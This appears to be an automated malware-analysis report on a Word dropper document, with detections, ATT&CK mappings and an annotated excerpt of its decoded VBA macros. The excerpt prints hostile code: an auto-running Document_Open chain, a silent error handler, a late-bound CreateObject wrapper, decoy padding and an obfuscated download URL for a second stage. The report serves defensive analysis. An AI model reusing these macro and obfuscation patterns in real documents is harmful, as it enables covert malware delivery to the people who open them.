MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document whose VBA project runs automatically on open: ThisDocument.Document_Open does nothing but call gBocEztRZe.wHABdRYucxkmp, which wraps its work in `On Error GoTo` with an empty handler, so any failure (blocked network, missing COM class) ends the macro silently with no dialog. The decoded source is padded with decoy procedures whose every call targets a routine not present in the preview; the live path is a CreateObject wrapper (fnoFLMswUo, which takes the ProgID as a parameter so no class name appears as a literal) plus a CallByName call that the heuristic flags but that falls outside the 1,000-line preview. Every meaningful string — including the download URL in zvXPQwVQaa, whose literal visibly contains the fragment `hMttvp6v:u//` — is passed through the decoder KWFclpEjCqnK.RnoQoSniML together with a per-string key; the key reads as a set of characters to discard, and on that reading the three strings in gBocEztRZe decode to an error message, the property name `ResponseBody`, and a plain http:// URL, but the decoder body is truncated here, so recover the URL by running the full decoder before recording it as an indicator. This is why the report's extracted-URL list contains only benign schemas.openxmlformats.org namespace URIs. The ClamAV signature Doc.Dropper.Donoff-5743527-0 is consistent with this structure: a dropper that fetches a second-stage payload and executes it.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro (auto-runs when the document is opened with macros enabled; see ThisDocument.Document_Open in the extracted source below)
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call (in the extracted source it sits in gBocEztRZe.fnoFLMswUo, which receives the ProgID as a parameter, so the instantiated class does not appear as a string literal)
-
CallByName call — high — OLE_VBA_CALLBYNAME: CallByName call (the call itself is not within the first 1,000 lines shown below; it is the usual way to invoke a method or property on a late-bound object without naming it in clear text)
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. When both p-code and decoded source are available, as here, compare them: if they disagree, the p-code is what Office executes.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Note that all three URLs listed here are OOXML namespace identifiers found in ordinary documents and carry no signal on their own; the macro's actual download URL is obfuscated (see zvXPQwVQaa in the extracted source) and is therefore not in this list. URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliography — in document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXml — in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17808 bytes |

SHA-256: 9f3c004e1949519177aee861f536fadfe6cb803a517827ec278546963cba141e
Preview script — first 1,000 lines of the extracted script. The listing is cut off partway through the decoder routine KWFclpEjCqnK.RnoQoSniML; download the artifact for the complete source.
' --- Module: ThisDocument (decoded by olevba from the sample's VBA project) ---
' The VB_* attributes below are project metadata emitted by the extractor, not executable statements.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub JRFABdjW(ByVal WxWnv As String, ByVal flNaQqqXMdBi As Integer)
' Decoy procedure: not referenced from any visible code. Both parameters are unused, every call
' targets a procedure that is not defined in the preview, and the assignments are to undeclared
' names. This looks like obfuscator padding, but whether the callees exist in the truncated
' modules cannot be confirmed from here.
CoUhlPI True, "VhY", 9044
HVoGUKq "zG1pF", ""
caINRnNgmrdBGB
ZqWcwMU = 6741
' YBwEfB is not defined in the preview; which branch runs cannot be determined here.
If YBwEfB("", 886, 440) Then
MCIRRhcWzSwqI = 9024
dXTbMEvLlRYkf
QPZMMG 1883
yNIAaBuA = 3192
FuKbI "hASM"
WbWJaj = "fg"
Else
pEdOivefzGcBr 653, 5024, 4694
kiqhklkDD "", 9258
xvRpty
iAskzZcbwSl = False
End If
End Sub
Private Sub sAhugHIUKqrD(ByVal flotDIOUrg As Integer)
' Decoy procedure: not referenced from any visible code; flotDIOUrg is unused and every callee
' is absent from the preview. Same padding pattern as JRFABdjW.
fTIAKCTaT "AQ", "doAZ", "YOc"
ciakz = 358
qgnhuOW
NRVJGGEh = "k8dcd"
' sQwkQLsArLMcUw is not defined in the preview.
If sQwkQLsArLMcUw(True, 55, True) Then
cSCQOywsTKpZCF = 4069
JpRiivoHBbda 555, "31U", 2131
ukyxFsqVYMlGmV = ""
GcZNjPtLkErWeg
Else
pstSHytyc
nlrxViMtSiPX 9355
CyjPEQTSJim = "DEMd"
End If
End Sub
Private Sub Document_Open()
' Auto-execution entry point: Word runs this when the document is opened with macros enabled
' (flagged as OLE_VBA_DOCOPEN / MITRE T1059.005). The two locals are declared and never used;
' the only effective statement is the call into module gBocEztRZe.
Dim jGQelHTesX As Integer
Dim imZPinFZXxBLwJ As Boolean
' Hands control to wHABdRYucxkmp, the dispatcher defined in module gBocEztRZe below.
gBocEztRZe.wHABdRYucxkmp
End Sub
' --- Module: gBocEztRZe — holds the dispatcher called from Document_Open, the CreateObject wrapper
' and the obfuscated string literals (URL, property name, message) ---
Attribute VB_Name = "gBocEztRZe"
Private Sub DpnMXbaFQHyTb(ByVal MkiINAGNaSq As String, ByVal pEBmq As String)
' Decoy procedure: not referenced from visible code, parameters unused, callees not in the preview.
ADsgsMKdqQm "pniSO"
bHEFyq = "k7DCA"
VjSpLvTwSVVK "GUo", "", True
End Sub
Private Sub JZbQPKQo(ByVal KKVDUgmnjBqO As Integer, ByVal KYInwmvFPvUNtB As String)
' Decoy procedure: not referenced from visible code, parameters unused, callees not in the preview.
VqknpLDo 3110
QtMhVXMnx = 6371
XNDLLDSArtDiw "3zz7", "hVE"
naMRsVze = True
ByjSxLNuJjA
End Sub
Private Sub sRbktzw(ByVal BimTLbpWzAG As String, ByVal RZYssLykifh As Boolean)
' Decoy procedure: three bare calls to procedures absent from the preview; parameters unused;
' not referenced from visible code.
yEKxYLxHlxTlao
huyzKe
aqGuhjnT
End Sub
Public Function fnoFLMswUo(ByVal SWiwTdfVQDpdB As String, ByVal ttMud As String) As Object
' Late-bound object factory (the OLE_VBA_CREATEOBJ finding). Instantiates whatever ProgID the
' caller passes in SWiwTdfVQDpdB, so the class name never appears as a literal in this module;
' ttMud is unused. The result is routed through HZgyWNsaPSsS, which returns it unchanged — an
' extra hop that separates the CreateObject token from its eventual consumer. No caller is
' visible in the preview; it presumably lives in a truncated module.
Dim KLjDf As Integer
Dim fKuGFuHSjjbj As String
Set fnoFLMswUo = HZgyWNsaPSsS(CreateObject(SWiwTdfVQDpdB))
End Function
Public Sub wHABdRYucxkmp()
' Dispatcher reached directly from ThisDocument.Document_Open. Both locals are unused.
Dim kPZEP As String
Dim sVBcLmORzyyD As Integer
' Any runtime error jumps to the empty label below, so a failure (blocked network, missing COM
' class, AMSI block) ends the macro silently without a visible dialog.
On Error GoTo rNuIwHyNdUPoEG
' Module gbPzqQLPY is not in the preview; what these two calls do cannot be determined here.
gbPzqQLPY.CsBvQWENw
gbPzqQLPY.EFsfKwbYJxmQ
' Passes the obfuscated URL string into eKAezceixnOzP (see cfXbaYPZNQOtqz below).
cfXbaYPZNQOtqz
Exit Sub
rNuIwHyNdUPoEG:
' Deliberately empty error handler: swallow and return.
End Sub
Private Sub fuibvbSsmHEnSg(ByVal wPHvLHFBsGvm As String)
' Decoy procedure: not referenced from visible code; wPHvLHFBsGvm is unused and every callee
' (including the condition qovZlzXQJaPk) is absent from the preview.
uMlTbiuEDW = "7sE"
If qovZlzXQJaPk Then
eEIhAAsS False, "fjI"
FLerwdF
iIdbmQAUIKPwIR True
Else
DQEEO 2123
End If
dtXGRzAEowlu "sqrs", 972
End Sub
Private Function HZgyWNsaPSsS(ByVal TrkGkKZoKNFi As Object) As Object
' Identity pass-through: returns the object it was handed. Exists only to put a hop between
' CreateObject (in fnoFLMswUo) and the code that uses the object. The local is unused.
Dim VgUNeGbHtO As Integer
Set HZgyWNsaPSsS = TrkGkKZoKNFi
End Function
Private Sub eKAezceixnOzP(ByVal qjcgqTUfslCvxr As String, ByVal sKLMzowLwrQM As String, ByVal wsdLkdM As String)
' Core routine on the live path (Document_Open -> wHABdRYucxkmp -> cfXbaYPZNQOtqz -> here).
' sKLMzowLwrQM is never used. The only visible caller passes the obfuscated URL literal from
' zvXPQwVQaa as wsdLkdM. Modules kKUAAZOCX, lSDsdu and mefgZvMHtYwz are outside the preview,
' so the exact COM calls are not visible here; the heuristic-flagged CallByName is plausibly
' inside one of them — confirm in the full artifact.
' Creates an object from (True, <obfuscated URL>) — presumably the download/request object; confirm in kKUAAZOCX.
Set kYGJHJXUOJlFcU = kKUAAZOCX.oijIXkkHqAawCe(True, wsdLkdM)
' Hands KsWqfMu (an obfuscated string, see below) and the object back into kKUAAZOCX.
kKUAAZOCX.pVMGKrxD KsWqfMu, 2670, "", kYGJHJXUOJlFcU
' Feeds mefgZvMHtYwz.MVlgvdkxDSU(<obfuscated string qhUoIHckSe>, object, 8879) into lSDsdu
' together with the first argument the caller supplied (lSDsdu.OcpeVPx).
lSDsdu.njaVJTRMFt mefgZvMHtYwz.MVlgvdkxDSU(qhUoIHckSe, kYGJHJXUOJlFcU, 8879), False, "xowQ", qjcgqTUfslCvxr
End Sub
Private Sub cfXbaYPZNQOtqz()
' Called from wHABdRYucxkmp. The local is unused. lSDsdu is not in the preview.
Dim vkmHO As Boolean
' Third argument is the obfuscated URL (zvXPQwVQaa); "Bq0" is passed into the unused parameter.
eKAezceixnOzP lSDsdu.OcpeVPx, "Bq0", zvXPQwVQaa
' Second call into the hidden module with the same lSDsdu.OcpeVPx value; purpose not visible here.
lSDsdu.WwdhmPbSQvgYha False, 618, lSDsdu.OcpeVPx
End Sub
Private Function KsWqfMu() As String
' Obfuscated string literal plus key, resolved at runtime by KWFclpEjCqnK.RnoQoSniML (whose body
' is truncated in the preview). The key reads as a set of characters to discard; on that reading
' this decodes to an English error/status message — confirm with the full decoder.
KsWqfMu = KWFclpEjCqnK.RnoQoSniML("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function qhUoIHckSe() As String
' Obfuscated string literal plus key (same scheme as KsWqfMu). On the strip-key reading this
' yields the property name "ResponseBody", i.e. a likely CallByName target on the request
' object created in eKAezceixnOzP — confirm with the full decoder.
qhUoIHckSe = KWFclpEjCqnK.RnoQoSniML("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function zvXPQwVQaa() As String
' Obfuscated download URL. The fragment "hMttvp6v:u//" is "http://" with characters from the
' key "6nUMGuv" interleaved; if RnoQoSniML strips the key characters (its body is truncated in
' the preview), the result is the plain URL. Recover it with the full decoder and record it as
' the network indicator — it does not appear in the report's extracted-URL list.
zvXPQwVQaa = KWFclpEjCqnK.RnoQoSniML("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function
' --- Module: KWFclpEjCqnK — contains RnoQoSniML, the string de-obfuscation routine invoked by the
' literals in gBocEztRZe (its body is cut off at the end of this preview) ---
Attribute VB_Name = "KWFclpEjCqnK"
Private Function YvofeRYoJx(ByVal rqvdIyAUeUs As Integer, ByVal jMtqQGmpJin As Integer, ByVal NibKbo As String, ByVal umAlGRCJBPXknQ As String) As String
' Not referenced from visible code. rqvdIyAUeUs and jMtqQGmpJin are unused. Returns umAlGRCJBPXknQ
' unchanged when ZpdFV.ANWBfONcAV(...) (module not in preview) is False; otherwise the function
' falls through and returns the default empty string.
If Not ZpdFV.ANWBfONcAV(umAlGRCJBPXknQ, False, False, NibKbo) Then
YvofeRYoJx = umAlGRCJBPXknQ
End If
End Function
Private Function XxrCMfhKm(ByVal GkQnFe As String) As String
' Decoy: not referenced from visible code, GkQnFe unused, two calls to procedures absent from the
' preview, then always returns the empty string.
jnuAOI
edgIIAzipXGERW = False
qldsDWDYOa
XxrCMfhKm = ""
End Function
Public Function RnoQoSniML(ByVal ixatViSCOYEyL As String, ByVal rjCYiBeI As String) As String
yhpPbbGZz = 4259
For JXNRhtyPpgrk = HXJhwfTZdLUHOJ To ZpdFV.SJWbYo("n4mC", "HA", ixatViSCOYEyL)
CAQbL = 8749
RnoQoSniML = ZpdFV.CAkUwqfVdJEw(5793, RnoQ
... (truncated)